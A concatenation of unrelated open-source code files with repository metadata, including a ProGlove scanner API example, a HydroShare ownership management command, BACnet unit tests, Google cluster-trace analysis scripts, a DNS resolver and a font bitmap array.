sLogXml = utils.processOutputChecked(asArgs);
# Parse the XML and add the entries to the database.
oParser = ET.XMLParser(target = ET.TreeBuilder(), encoding = 'utf-8');
oParser.feed(sLogXml.encode('utf-8')); # does its own decoding and processOutputChecked always gives us decoded utf-8 now.
oRoot = oParser.close();
for oLogEntry in oRoot.findall('logentry'):
iRevision = int(oLogEntry.get('revision'));
sAuthor = oLogEntry.findtext('author').strip();
sDate = oLogEntry.findtext('date').strip();
sMessage = oLogEntry.findtext('msg', '').strip();
if sMessage == '':
sMessage = ' ';
elif len(sMessage) > VcsRevisionData.kcchMax_sMessage:
sMessage = sMessage[:VcsRevisionData.kcchMax_sMessage - 4] + ' ...';
if not self.oConfig.fQuiet:
utils.printOut(u'sDate=%s iRev=%u sAuthor=%s sMsg[%s]=%s'
% (sDate, iRevision, sAuthor, type(sMessage).__name__, sMessage));
oData = VcsRevisionData().initFromValues(self.oConfig.sRepository, iRevision, sDate, sAuthor, sMessage);
oLogic.addVcsRevision(oData);
oDb.commit();
oDb.close();
return 0;
if __name__ == '__main__':
sys.exit(VcsImport().main());
| 1.726563 | 2 |
proglove_streams/app_example.py | workaroundgmbh/proglove_streams_api_reference | 0 | 12762175 | """Minimal example dumping whatever event it receives."""
import time
import logging
import argparse
from proglove_streams.logging import init_logging
from proglove_streams.client import Client
from proglove_streams.gateway import Gateway, GatewayMessageHandler
from proglove_streams.exception import ProgloveStreamsException
from proglove_streams.models.scan import ScanEvent
from proglove_streams.models.scanner_state import ScannerStateEvent
from proglove_streams.models.error import ErrorEvent
from proglove_streams.models.gateway_state import GatewayStateEvent
from proglove_streams.models.button_pressed import ButtonPressedEvent
logger = logging.getLogger(__name__)
def _set_display(client: Gateway, event: ScanEvent):
client.set_display(str(event.device_serial), 'PG3',
display_fields=[
{
"display_field_id": 1,
"display_field_header": "Storage Unit",
"display_field_text": "R15"
},
{
"display_field_id": 2,
"display_field_header": "Item",
"display_field_text": "Engine 12"
},
{
"display_field_id": 3,
"display_field_header": "Quantity",
"display_field_text": "10"
}
])
def _block_trigger(client: Gateway, event: ScanEvent):
client.set_trigger_block(str(event.device_serial), True,
["TRIGGER_SINGLE_CLICK"], [],
time_validity_duration=3000)
def _unblock_trigger(client: Gateway, event: ScanEvent):
client.set_trigger_block(str(event.device_serial), False,
[], [])
def on_connected(_client: Client, event: ScannerStateEvent) -> None:
"""On connected event callback."""
logger.info('device connected: %s', event.device_serial)
def on_disconnected(_client: Client, event: ScannerStateEvent) -> None:
"""On disconnected event callback."""
logger.info('device disconnected: %s', event.device_serial)
def on_scan(client: Client, event: ScanEvent) -> None:
"""On scan event callback."""
if not isinstance(client, Gateway):
return
logger.info(
'scan received: device %s, data: %s',
event.device_serial,
repr(event.scan_code)
)
scan_code = str(event.scan_code).split('\r')[0]
if scan_code == 'DISPLAY':
_set_display(client, event)
elif scan_code == 'BLOCK':
_block_trigger(client, event)
elif scan_code == 'UNBLOCK':
_unblock_trigger(client, event)
elif scan_code == 'FEEDBACK_OK':
client.send_feedback(str(event.device_serial), 'FEEDBACK_POSITIVE')
elif scan_code == 'FEEDBACK_NOK':
client.send_feedback(str(event.device_serial), 'FEEDBACK_NEGATIVE')
elif scan_code == 'STATE':
client.get_gateway_state()
def on_error(_client: Client, event: ErrorEvent) -> None:
"""On error event callback."""
logger.info('error received: %s', event.error_code)
def on_gateway_state_event(_client: Client, event: GatewayStateEvent):
"""On Gateway state event callback."""
logger.info('''Gateway state received: serial: %s version: %s
connected devices: %s''',
event.gateway_serial,
event.gateway_app_version,
','.join([d.device_serial
for d in event.device_connected_list]))
def on_button_pressed_event(_client: Client,
event: ButtonPressedEvent) -> None:
"""On error event callback."""
logger.info('button pressed: device %s, trigger gesture: %s',
event.device_serial,
event.trigger_gesture)
def app_example():
"""Example of Streams API usage."""
parser = argparse.ArgumentParser('proglove_streams')
parser.add_argument(
'-L', '--logging-level',
help='set the logging level (default is DEBUG)',
type=str,
metavar='LEVEL',
choices=('DEBUG', 'INFO', 'WARNING', 'ERROR'),
default='DEBUG'
)
parser.add_argument(
'-b', '--baudrate',
help='use a specific baudarate (default is 115200)',
type=int,
metavar='VALUE',
default=115200
)
parser.add_argument(
'port',
help='path to the serial device port (e.g. COM1, /dev/ttyACM0)',
type=str,
metavar='PORT',
)
args = parser.parse_args()
device = args.port
baudrate = args.baudrate
init_logging(getattr(logging, args.logging_level))
logger.info('Streams API example application.')
handler = GatewayMessageHandler(
on_scanner_connected=on_connected,
on_scanner_disconnected=on_disconnected,
on_scan=on_scan,
on_error=on_error,
on_gateway_state_event=on_gateway_state_event,
on_button_pressed=on_button_pressed_event
)
try:
gateway = Gateway(handler, device, baudrate)
gateway.start()
except ProgloveStreamsException as e:
logging.error('Streams API exception: %s', e)
return
logger.info('application started, press Ctrl-C to exit')
try:
while True:
time.sleep(1000)
except KeyboardInterrupt:
gateway.stop()
| 2.328125 | 2 |
hs_core/management/commands/add_owner.py | hydroshare/hydroshare | 178 | 12762176 | """ Add an owner to a resource or resources
Usage: add_owner {username} {resource list}
"""
from django.core.management.base import BaseCommand
from django.contrib.auth.models import User
from hs_core.models import BaseResource
from hs_core.hydroshare.utils import get_resource_by_shortkey
from hs_access_control.models.privilege import UserResourcePrivilege, PrivilegeCodes
from django_irods.icommands import SessionException
from django.db import transaction
def set_quota_holder(resource, user):
try:
resource.set_quota_holder(user, user)
except SessionException as ex:
# some resources copied from www for testing do not exist in the iRODS backend,
# hence need to skip these test artifects
print(resource.short_id + ' raised SessionException when setting quota holder: ' +
ex.stderr)
except AttributeError as ex:
# when federation is not set up correctly, istorage does not have a session
# attribute, hence raise AttributeError - ignore for testing
print((resource.short_id + ' raised AttributeError when setting quota holder: ' +
str(ex)))
except ValueError as ex:
# when federation is not set up correctly, istorage does not have a session
# attribute, hence raise AttributeError - ignore for testing
print((resource.short_id + ' raised ValueError when setting quota holder: ' +
str(ex)))
class Command(BaseCommand):
help = "add owner to resource"
def add_arguments(self, parser):
parser.add_argument('new_owner', type=str)
parser.add_argument(
'--owned_by',
dest='owned_by',
help='prior owner of the resources'
)
parser.add_argument(
'--set_quota_holder',
action='store_true', # True for presence, False for absence
dest='set_quota_holder', # value is options['set_quota_holder']
help='set quota holder as new owner')
# a list of resource id's: none does nothing.
parser.add_argument('resource_ids', nargs='*', type=str)
def handle(self, *args, **options):
user = User.objects.get(username=options['new_owner'])
admin = User.objects.get(username='admin')
if options['owned_by'] is not None:
prior = User.objects.get(username=options['owned_by'])
for res in BaseResource.objects.filter(r2urp__user=prior,
r2urp__privilege=PrivilegeCodes.OWNER):
with transaction.atomic():
resource = res.get_content_model()
UserResourcePrivilege.share(user=user,
resource=resource,
privilege=PrivilegeCodes.OWNER,
grantor=admin)
print("added owner {} to {}".format(options['new_owner'], resource.short_id))
if options['set_quota_holder']:
set_quota_holder(resource, user)
print("set quota holder to {} for {}".format(options['new_owner'],
resource.short_id))
if len(options['resource_ids']) > 0: # an array of resource short_id to check.
for rid in options['resource_ids']:
resource = get_resource_by_shortkey(rid, or_404=False)
with transaction.atomic():
UserResourcePrivilege.share(user=user,
resource=resource,
privilege=PrivilegeCodes.OWNER,
grantor=admin)
print("added owner {} to {}".format(options['new_owner'], rid))
if options['set_quota_holder']:
set_quota_holder(resource, user)
print("set quota holder to {} for {}".format(options['new_owner'],
resource.short_id))
| 2.359375 | 2 |
baekjoon/11866.py | GihwanKim/Baekjoon | 0 | 12762177 | <gh_stars>0
"""
11866 : 조세퍼스 문제 0
URL : https://www.acmicpc.net/problem/11866
Input :
7 3
Output :
<3, 6, 2, 7, 5, 1, 4>
"""
N, M = map(int, input().split(' '))
i = 0
josephus = []
sequence = [i for i in range(1, N + 1)]
while sequence:
i = (i + M - 1) % len(sequence)
josephus.append(sequence[i])
sequence.remove(sequence[i])
print("<{}>".format(', '.join(str(c) for c in josephus)))
| 3.1875 | 3 |
util/config/validators/test/test_validate_database.py | anwarchk/quay | 1 | 12762178 | <filename>util/config/validators/test/test_validate_database.py
import pytest
from util.config.validator import ValidatorContext
from util.config.validators import ConfigValidationException
from util.config.validators.validate_database import DatabaseValidator
from test.fixtures import *
@pytest.mark.parametrize('unvalidated_config,user,user_password,expected', [
(ValidatorContext(None), None, None, TypeError),
(ValidatorContext({}), None, None, KeyError),
(ValidatorContext({'DB_URI': 'sqlite:///:memory:'}), None, None, None),
(ValidatorContext({'DB_URI': 'invalid:///:memory:'}), None, None, KeyError),
(ValidatorContext({'DB_NOTURI': 'sqlite:///:memory:'}), None, None, KeyError),
])
def test_validate_database(unvalidated_config, user, user_password, expected, app):
validator = DatabaseValidator()
if expected is not None:
with pytest.raises(expected):
validator.validate(unvalidated_config)
else:
validator.validate(unvalidated_config)
| 2.546875 | 3 |
services/backend/tests/test_main.py | gideonmandu/note_taking_app | 0 | 12762179 | <gh_stars>0
from tests.confest import test_app
def test_home(test_app):
response = test_app.get('/')
assert response.status_code == 200
assert response.json() == {"message": "hello, world!"}
| 2.15625 | 2 |
tests/schema/data/__init__.py | datapio/klander | 2 | 12762180 | <reponame>datapio/klander<gh_stars>1-10
from .state_reconciler import *
from .response import *
| 1.0625 | 1 |
tests/test_primitive_data/test_real.py | amih90/bacpypes | 240 | 12762181 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Test Primitive Data Real
------------------------
"""
import unittest
import struct
import math
from bacpypes.debugging import bacpypes_debugging, ModuleLogger, xtob
from bacpypes.errors import InvalidTag
from bacpypes.primitivedata import Real, Tag
# some debugging
_debug = 0
_log = ModuleLogger(globals())
@bacpypes_debugging
def real_tag(x):
"""Convert a hex string to an real application tag."""
if _debug: real_tag._debug("real_tag %r", x)
b = xtob(x)
tag = Tag(Tag.applicationTagClass, Tag.realAppTag, len(b), b)
if _debug: real_tag._debug(" - tag: %r", tag)
return tag
@bacpypes_debugging
def real_encode(obj):
"""Encode an Real object into a tag."""
if _debug: real_encode._debug("real_encode %r", obj)
tag = Tag()
obj.encode(tag)
if _debug: real_encode._debug(" - tag: %r, %r", tag, tag.tagData)
return tag
@bacpypes_debugging
def real_decode(tag):
"""Decode an real application tag into an real."""
if _debug: real_decode._debug("real_decode %r", tag)
obj = Real(tag)
if _debug: real_decode._debug(" - obj: %r, %r", obj, obj.value)
return obj
@bacpypes_debugging
def real_endec(v, x):
"""Pass the value to Real, construct a tag from the hex string,
and compare results of encode and decoding each other."""
if _debug: real_endec._debug("real_endec %r %r", v, x)
tag = real_tag(x)
if _debug: real_endec._debug(" - tag: %r, %r", tag, tag.tagData)
obj = Real(v)
if _debug: real_endec._debug(" - obj: %r, %r", obj, obj.value)
assert real_encode(obj) == tag
if _debug: real_endec._debug(" - tags match")
if math.isnan(v):
assert math.isnan(real_decode(tag).value)
if _debug: real_endec._debug(" - both NaN")
else:
assert real_decode(tag) == obj
if _debug: real_endec._debug(" - objects match")
@bacpypes_debugging
class TestReal(unittest.TestCase):
def test_real(self):
if _debug: TestReal._debug("test_real")
obj = Real()
assert obj.value == 0.0
with self.assertRaises(TypeError):
Real("some string")
def test_real_real(self):
if _debug: TestReal._debug("test_real_real")
obj = Real(1.0)
assert obj.value == 1.0
assert str(obj) == "Real(1)"
obj = Real(73.5)
assert obj.value == 73.5
assert str(obj) == "Real(73.5)"
def test_real_tag(self):
if _debug: TestReal._debug("test_real_tag")
tag = Tag(Tag.applicationTagClass, Tag.realAppTag, 1, xtob('3f800000'))
obj = Real(tag)
assert obj.value == 1.0
tag = Tag(Tag.applicationTagClass, Tag.booleanAppTag, 0, xtob(''))
with self.assertRaises(InvalidTag):
Real(tag)
tag = Tag(Tag.contextTagClass, 0, 1, xtob('ff'))
with self.assertRaises(InvalidTag):
Real(tag)
tag = Tag(Tag.openingTagClass, 0)
with self.assertRaises(InvalidTag):
Real(tag)
def test_real_copy(self):
if _debug: TestReal._debug("test_real_copy")
obj1 = Real(12)
obj2 = Real(obj1)
assert obj2.value == 12
def test_real_endec(self):
if _debug: TestReal._debug("test_real_endec")
with self.assertRaises(InvalidTag):
obj = Real(real_tag(''))
real_endec(0, '00000000')
real_endec(1, '3f800000')
real_endec(-1, 'bf800000')
real_endec(73.5, '42930000')
inf = float('inf')
real_endec(inf, '7f800000')
real_endec(-inf, 'ff800000')
nan = float('nan')
real_endec(nan, '7fc00000') | 2.703125 | 3 |
google_data.py | mfatihaktas/q_sim | 2 | 12762182 | import matplotlib, numpy, pprint
# matplotlib.rcParams['pdf.fonttype'] = 42
# matplotlib.rcParams['ps.fonttype'] = 42
matplotlib.use('Agg')
import matplotlib.pyplot as plot
import gzip, csv, pylab
from collections import namedtuple
from rvs import *
from patch import *
"""
task events table contains the following fields:
1. timestamp
2. missing info
3. job ID
4. task index - within the job
5. machine ID
6. event type
7. user name
8. scheduling class
9. priority
10. resource request for CPU cores
11. resource request for RAM
12. resource request for local disk space
13. different-machine constraint
"""
jobevents_f_to_i = {
'timestamp': 0,
'job id': 2,
'event': 3,
'job name': 6,
'logical job name': 7
}
taskevents_f_to_i = {
'timestamp': 0,
'job id': 2,
'task index': 3,
'event': 5
}
e_to_i = {
'schedule': 1,
'finish': 4
}
def counter_to_furl(counter, obj="task"):
part = str(counter)
part = (5 - len(part) )*'0' + part
return "/home/mfa51/google-clusterdata-2011/{}_events/part-{}-of-00500.csv.gz".format(obj, part)
def deneme():
job_task_i__sch_finish_time_m = {}
counter = 0
while 1:
furl = counter_to_furl(counter)
try:
with gzip.open(furl, mode="rt") as f:
reader = csv.reader(f)
for line in reader:
i = line[taskevents_f_to_i['job id'] ] + '_' + line[taskevents_f_to_i['task index'] ]
e = int(line[taskevents_f_to_i['event'] ] )
if e == e_to_i['schedule'] or e == e_to_i['finish']:
t = float(line[taskevents_f_to_i['timestamp'] ] )/10**6
if i not in job_task_i__sch_finish_time_m:
job_task_i__sch_finish_time_m[i] = [t]
else:
job_task_i__sch_finish_time_m[i].append(t)
except (OSError, IOError) as e:
log(WARNING, "done with the files.")
break
counter += 1
if counter > 10:
break
with open("task_lifetime.dat", 'wt') as f:
writer = csv.writer(f, delimiter=',')
for job_task_i,sch_finish_time in job_task_i__sch_finish_time_m.items():
if len(sch_finish_time) >= 2:
sch_finish_time = [t for t in sch_finish_time if t]
if len(sch_finish_time) == 1:
sch_finish_time.append(0)
# elif len(sch_finish_time) > 2:
# log(WARNING, "More than 2 scheduling or finish events for single task; sch_finish_time= {}".format(sch_finish_time) )
lifetime = abs(sch_finish_time[1] - sch_finish_time[0] )
writer.writerow([job_task_i, lifetime] )
def write_num_tasks_per_job():
wf = open("num_tasks.dat", 'wt')
writer = csv.writer(wf, delimiter=',')
counter = 0
while 1:
print("counter= {}".format(counter) )
ji__ti_l_m = {}
furl = counter_to_furl(counter)
try:
with gzip.open(furl, mode="rt") as f:
reader = csv.reader(f)
for line in reader:
ji = int(line[taskevents_f_to_i['job id'] ] )
ti = int(line[taskevents_f_to_i['task index'] ] )
e = int(line[taskevents_f_to_i['event'] ] )
if e == e_to_i['schedule']:
if ji not in ji__ti_l_m:
ji__ti_l_m[ji] = set()
ji__ti_l_m[ji].add(ti)
print("counter= {}, writing now...".format(counter) )
for ji, ti_l in ji__ti_l_m.items():
writer.writerow([ji, len(ti_l) ] )
except (OSError, IOError) as e:
log(WARNING, "done with the files.")
break
counter += 1
if counter > 510:
break
wf.close()
def do_possible_merges_in_num_tasks():
ji__num_task_m = {}
with open("num_tasks.dat", mode="rt") as f:
reader = csv.reader(f)
for line in reader:
ji = int(line[0] )
num_task = int(line[1] )
if ji not in ji__num_task_m:
ji__num_task_m[ji] = 0
ji__num_task_m[ji] += num_task
with open("num_tasks_merged.dat", mode="wt") as f:
writer = csv.writer(f, delimiter=',')
for ji, num_tasks in ji__num_task_m.items():
writer.writerow([ji, num_tasks] )
log(WARNING, "done.")
def write_jobs_w_num_task(num_task):
ji_l = []
with open("num_tasks_merged.dat", mode="rt") as f:
reader = csv.reader(f)
for line in reader:
num_task_ = int(line[1] )
if num_task_ == num_task:
ji_l.append(int(line[0] ) )
print("writing, len(ji_l)= {}".format(len(ji_l) ) )
with open("jobs_w_num_task_{}.dat".format(num_task), mode="wt") as f:
writer = csv.writer(f, delimiter=',')
for ji in ji_l:
writer.writerow([ji] )
log(WARNING, "done.")
def write_task_lifetimes(num_task):
log(WARNING, "started; num_task= {}".format(num_task) )
ji_l = []
with open("jobs_w_num_task_{}.dat".format(num_task), mode="rt") as f:
reader = csv.reader(f)
for line in reader:
ji_l.append(int(line[0] ) )
#
Entry = namedtuple('Entry', 'ji ti')
entry__sch_fin_l_m = {}
counter = 0
while 1:
print("counter= {}".format(counter) )
furl = counter_to_furl(counter)
try:
with gzip.open(furl, mode="rt") as f:
reader = csv.reader(f)
for line in reader:
ji = int(line[taskevents_f_to_i['job id'] ] )
if ji in ji_l:
e = int(line[taskevents_f_to_i['event'] ] )
if e == e_to_i['schedule'] or e == e_to_i['finish']:
ti = int(line[taskevents_f_to_i['task index'] ] )
entry = Entry(ji=ji, ti=ti)
t = float(line[taskevents_f_to_i['timestamp'] ] )/10**6
if entry not in entry__sch_fin_l_m:
entry__sch_fin_l_m[entry] = [0,0]
if e == e_to_i['schedule']:
entry__sch_fin_l_m[entry][0] = t
elif e == e_to_i['finish']:
entry__sch_fin_l_m[entry][1] = t
except (OSError, IOError) as e:
log(WARNING, "done with the files.")
break
counter += 1
if counter > 510:
break
print("writing now...")
with open("task_lifetimes_for_jobs_w_num_task_{}.dat".format(num_task), mode="wt") as f:
writer = csv.writer(f, delimiter=',')
for entry, sch_fin_tuple in entry__sch_fin_l_m.items():
if sch_fin_tuple[0] < sch_fin_tuple[1]:
lt = sch_fin_tuple[1] - sch_fin_tuple[0]
writer.writerow([lt] )
log(WARNING, "done.")
def filter_task_lifetimes(num_task):
lifetime_l = []
with open("task_lifetimes_for_jobs_w_num_task_{}.dat".format(num_task), mode="rt") as f:
reader = csv.reader(f)
for line in reader:
lt = float(line[0] )
if lt < 5000:
lifetime_l.append(lt)
with open("filtered_task_lifetimes_for_jobs_w_num_task_{}.dat".format(num_task), mode="wt") as f:
writer = csv.writer(f, delimiter=',')
for lt in lifetime_l:
writer.writerow([lt] )
log(WARNING, "done.")
# ****************************** PLOT ***************************** #
def plot_num_tasks_hist():
num_tasks_l = []
with open("num_tasks_merged.dat", mode="rt") as f:
reader = csv.reader(f)
for line in reader:
num_task = int(line[1] )
# if num_task > 1000:
# print("num_task= {}".format(num_task) )
# if num_task > 1 and num_task < 2000:
num_tasks_l.append(num_task)
# num_task__num_job_m = {}
# for n in num_tasks_l:
# if n not in num_task__num_job_m:
# num_task__num_job_m[n] = 0
# num_task__num_job_m[n] += 1
# print("num_task__num_job_m= {}".format(pprint.pformat(num_task__num_job_m) ) )
# plot.hist(num_tasks_l, bins=1000, histtype='step')
plot.hist(num_tasks_l, bins=100, histtype='step', normed=True, lw=2)
plot.xlabel("Number of tasks")
plot.ylabel("Frequency")
plot.savefig("plot_num_tasks_hist.png", bbox_inches='tight')
plot.gcf().clear()
log(WARNING, "done.")
def plot_task_lifetime_hist(k):
lifetime_l = []
with open("filtered_task_lifetimes_for_jobs_w_num_task_{}.dat".format(k), mode="rt") as f:
reader = csv.reader(f)
for line in reader:
lifetime_l.append(float(line[0] ) )
# rv = Pareto(a=2, loc=2)
# for i in range(1000000):
# lifetime_l.append(rv.gen_sample() )
lifetime_l = numpy.sort(lifetime_l)
print("len(lifetime_l)= {}".format(len(lifetime_l) ) )
fig = plot.figure(1)
# def_size = fig.get_size_inches()
# fig.set_size_inches(def_size[0]*1.5, def_size[1] )
plot.subplot(211)
# plot.step(x_l, y_l, 'bo', label='log-linear', lw=2)
plot.hist(lifetime_l, bins=100, histtype='step', normed=True, lw=2)
plot.xlabel("X (s)")
plot.ylabel("Frequency")
plot.title(r'$k= {}$'.format(k) )
x_l = lifetime_l[::-1]
y_l = numpy.arange(lifetime_l.size)/lifetime_l.size
plot.subplot(223)
plot.yscale('log')
plot.step(x_l, y_l, 'bo', label='log(tail) vs. X', lw=2)
plot.xlabel("X (s)")
plot.ylabel("Tail")
plot.legend()
plot.subplot(224)
plot.xscale('log')
plot.yscale('log')
plot.step(x_l, y_l, 'bo', label='log(tail) vs. log(X)', lw=2)
plot.xlabel("X (s)")
plot.legend()
# plot.xlabel("X")
# plot.xlabel("Task lifetime X (s)")
# plot.ylabel(r'$Pr\{X > x\}$')
plot.savefig("plot_task_lifetime_hist_k_{}.png".format(k) )
plot.gcf().clear()
log(WARNING, "done; k= {}".format(k) )
def pplot_task_lifetime_hist(k):
log(INFO, "started; k= {}".format(k) )
lifetime_l = []
# with open("filtered_task_lifetimes_for_jobs_w_num_task_{}.dat".format(k), mode="rt") as f:
with open("task_lifetimes_for_jobs_w_num_task_{}.dat".format(k), mode="rt") as f:
reader = csv.reader(f)
for line in reader:
lifetime_l.append(float(line[0] ) )
lifetime_l = numpy.sort(lifetime_l)
print("len(lifetime_l)= {}".format(len(lifetime_l) ) )
#
# plot.hist(lifetime_l, bins=100, histtype='step', normed=True, lw=2)
x_l = lifetime_l[::-1]
y_l = numpy.arange(lifetime_l.size)/lifetime_l.size
# y_l = [math.log(y + 0.000001) for y in y_l]
# m, b = numpy.polyfit(x_l, y_l, 1)
# plot.plot(x_l, m*x_l+b, 'r', lw=1, ls=':')
# step_size = 10
# num_rank = math.ceil(x_l[0]/step_size)
# # rank__avg_lifetime_l = []
# rank__num_lifetime_l = []
# i = 0
# for r in range(1, num_rank+1):
# sum_ = 0
# counter = 0
# while i < len(x_l) and x_l[i] > x_l[0]-r*step_size:
# counter += 1
# sum_ += x_l[i]
# i += 1
# rank__num_lifetime_l.append(counter)
# # avg = 0
# # if counter:
# # avg = sum_/counter
# # rank__avg_lifetime_l.append(avg)
# # print("i= {}, rank__avg_lifetime_l=\n{}".format(i, rank__avg_lifetime_l) )
# rank__num_lifetime_l = list(reversed(rank__num_lifetime_l) )
# rank_freq_l = [n/sum(rank__num_lifetime_l) for n in rank__num_lifetime_l]
# rank_tailprob_l = [sum(rank_freq_l[r-1:]) for r in range(1, num_rank+1) ]
# # plot.plot(range(1, num_rank+1), rank__avg_lifetime_l, 'bo', ls=':')
# # plot.xlabel(r'Rank', fontsize=13)
# # plot.ylabel(r'Tail distribution', fontsize=13)
# # plot.step(range(1, num_rank+1), rank_tailprob_l, 'bo', ls=':')
# # plot.yscale('log')
# # plot.xscale('log')
if k == 15:
plot.xlim(([10, 2*10**5] ) )
plot.ylim(([1/2*10**(-5), 1.3] ) )
elif k == 400:
plot.xlim(([10, 2*10**4] ) )
plot.ylim(([10**(-6), 1.3] ) )
elif k == 1050:
plot.xlim(([10, 2*10**4] ) )
plot.ylim(([10**(-6), 1.3] ) )
# plot.step(x_l, y_l, 'bo', lw=1, ls=':')
plot.step(x_l, y_l, 'bo', ms=10, mew=0, ls=':')
plot.xscale('log')
plot.yscale('log')
plot.xlabel(r'Task lifetime', fontsize=18)
plot.ylabel(r'Tail distribution', fontsize=18)
# plot.ylabel(r'Fraction of tasks completed in x')
# plot.title(r'Jobs with {} tasks'.format(k), fontsize=13)
# plot.title('k= {}, Mean= {}, Stdev= {}'.format(k, round(numpy.mean(x_l), 1), round(numpy.std(x_l), 1) ), fontsize=13)
plot.title('k= {}, Mean= {}'.format(k, round(numpy.mean(x_l), 1) ), fontsize=18)
plot.gcf().set_size_inches(4, 3)
prettify(plot.gca() )
# plot.savefig("pplot_task_lifetime_hist_k_{}.pdf".format(k) )
plot.savefig("pplot_task_lifetime_hist_k_{}.png".format(k), bbox_inches='tight')
plot.gcf().clear()
log(WARNING, "done; k= {}".format(k) )
def plot_qq_task_lifetimes(k):
lifetime_l = []
# with open("filtered_task_lifetimes_for_jobs_w_num_task_{}.dat".format(k), mode="rt") as f:
with open("task_lifetimes_for_jobs_w_num_task_{}.dat".format(k), mode="rt") as f:
reader = csv.reader(f)
for line in reader:
lifetime_l.append(float(line[0] ) )
lifetime_l = numpy.sort(lifetime_l)
print("len(lifetime_l)= {}".format(len(lifetime_l) ) )
# For different dists: https://docs.scipy.org/doc/scipy/reference/stats.html
# scipy.stats.probplot(lifetime_l, dist="expon", plot=plot)
# scipy.stats.probplot(lifetime_l, dist="pareto", sparams=(1.2,), plot=plot)
plot.savefig("plot_qq_task_lifetimes_k_{}.png".format(k) )
log(WARNING, "done; k= {}".format(k) )
if __name__ == "__main__":
## Uncomment with caution!
# write_num_tasks_per_job()
# do_possible_merges_in_num_tasks()
# write_jobs_w_num_task(num_task=15)
# write_jobs_w_num_task(num_task=400)
# write_jobs_w_num_task(num_task=1000)
# write_jobs_w_num_task(num_task=1050)
# write_task_lifetimes(num_task=15)
# filter_task_lifetimes(num_task=15)
# write_task_lifetimes(num_task=400)
# filter_task_lifetimes(num_task=400)
# write_task_lifetimes(num_task=1000)
# filter_task_lifetimes(num_task=1000)
# write_task_lifetimes(num_task=1050)
# filter_task_lifetimes(num_task=1050)
# plot_num_tasks_hist()
# plot_task_lifetime_hist(k=15)
# plot_task_lifetime_hist(k=400)
# plot_task_lifetime_hist(k=1000)
# plot_task_lifetime_hist(k=1050)
# pplot_task_lifetime_hist(k=15)
# pplot_task_lifetime_hist(k=400)
# pplot_task_lifetime_hist(k=1000)
pplot_task_lifetime_hist(k=1050)
# plot_qq_task_lifetimes(k=400)
pass
| 2.234375 | 2 |
asyncdns/unix.py | defendertx/asyncdns | 0 | 12762183 | <filename>asyncdns/unix.py
import re
import ipaddress
import time
import os
from .resolver import Resolver, RoundRobinServer, RandomServer
_space_re = re.compile(b'\\s+')
class SystemResolver(Resolver):
def __init__(self):
self._servers = None
self._servers_timestamp = None
super(SystemResolver, self).__init__()
def read_servers(self):
servers = []
with open('/etc/resolv.conf', 'rb') as f:
for line in f:
line = line.strip()
if not line or line.startswith(b'#'):
continue
fields = _space_re.split(line)
if len(fields) < 2:
continue
if fields[0] != b'nameserver':
continue
try:
addr = ipaddress.ip_address(fields[1].decode('ascii'))
except ValueError:
continue
servers.append((addr, 53))
self._servers = RoundRobinServer(servers)
def maybe_read_servers(self):
now = time.time()
if self._servers_timestamp is not None \
and now - self._servers_timestamp < 30:
return
s = os.stat('/etc/resolv.conf')
if self._servers_timestamp is None \
or s.st_mtime > self._servers_timestamp:
self._servers_timestamp = s.st_mtime
self.read_servers()
def lookup(self, query,
should_cache=True, recursive=False, prefer_ipv6=False):
self.maybe_read_servers()
return super(SystemResolver, self).lookup(query, self._servers,
should_cache,
recursive, prefer_ipv6)
| 2.671875 | 3 |
calculator/exception/__init__.py | kamilcieslik/test_house_price_lib | 0 | 12762184 | from .construction_year_violation_exception import ConstructionYearViolationException
from .flat_parameter_mismatch_exception import FlatParameterMismatchException
| 1.195313 | 1 |
fonts/FreeMono9pt7b.py | cnobile2012/Python-TFT | 0 | 12762185 | FreeMono9pt7bBitmaps = [
0xAA, 0xA8, 0x0C, 0xED, 0x24, 0x92, 0x48, 0x24, 0x48, 0x91, 0x2F, 0xE4,
0x89, 0x7F, 0x28, 0x51, 0x22, 0x40, 0x08, 0x3E, 0x62, 0x40, 0x30, 0x0E,
0x01, 0x81, 0xC3, 0xBE, 0x08, 0x08, 0x71, 0x12, 0x23, 0x80, 0x23, 0xB8,
0x0E, 0x22, 0x44, 0x70, 0x38, 0x81, 0x02, 0x06, 0x1A, 0x65, 0x46, 0xC8,
0xEC, 0xE9, 0x24, 0x5A, 0xAA, 0xA9, 0x40, 0xA9, 0x55, 0x5A, 0x80, 0x10,
0x22, 0x4B, 0xE3, 0x05, 0x11, 0x00, 0x10, 0x20, 0x47, 0xF1, 0x02, 0x04,
0x00, 0x6B, 0x48, 0xFF, 0x00, 0xF0, 0x02, 0x08, 0x10, 0x60, 0x81, 0x04,
0x08, 0x20, 0x41, 0x02, 0x08, 0x00, 0x38, 0x8A, 0x0C, 0x18, 0x30, 0x60,
0xC1, 0x82, 0x88, 0xE0, 0x27, 0x28, 0x42, 0x10, 0x84, 0x21, 0x3E, 0x38,
0x8A, 0x08, 0x10, 0x20, 0x82, 0x08, 0x61, 0x03, 0xF8, 0x7C, 0x06, 0x02,
0x02, 0x1C, 0x06, 0x01, 0x01, 0x01, 0x42, 0x3C, 0x18, 0xA2, 0x92, 0x8A,
0x28, 0xBF, 0x08, 0x21, 0xC0, 0x7C, 0x81, 0x03, 0xE4, 0x40, 0x40, 0x81,
0x03, 0x88, 0xE0, 0x1E, 0x41, 0x04, 0x0B, 0x98, 0xB0, 0xC1, 0xC2, 0x88,
0xE0, 0xFE, 0x04, 0x08, 0x20, 0x40, 0x82, 0x04, 0x08, 0x20, 0x40, 0x38,
0x8A, 0x0C, 0x14, 0x47, 0x11, 0x41, 0x83, 0x8C, 0xE0, 0x38, 0x8A, 0x1C,
0x18, 0x68, 0xCE, 0x81, 0x04, 0x13, 0xC0, 0xF0, 0x0F, 0x6C, 0x00, 0xD2,
0xD2, 0x00, 0x03, 0x04, 0x18, 0x60, 0x60, 0x18, 0x04, 0x03, 0xFF, 0x80,
0x00, 0x1F, 0xF0, 0x40, 0x18, 0x03, 0x00, 0x60, 0x20, 0x60, 0xC0, 0x80,
0x3D, 0x84, 0x08, 0x30, 0xC2, 0x00, 0x00, 0x00, 0x30, 0x3C, 0x46, 0x82,
0x8E, 0xB2, 0xA2, 0xA2, 0x9F, 0x80, 0x80, 0x40, 0x3C, 0x3C, 0x01, 0x40,
0x28, 0x09, 0x01, 0x10, 0x42, 0x0F, 0xC1, 0x04, 0x40, 0x9E, 0x3C, 0xFE,
0x21, 0x90, 0x48, 0x67, 0xE2, 0x09, 0x02, 0x81, 0x41, 0xFF, 0x80, 0x3E,
0xB0, 0xF0, 0x30, 0x08, 0x04, 0x02, 0x00, 0x80, 0x60, 0x8F, 0x80, 0xFE,
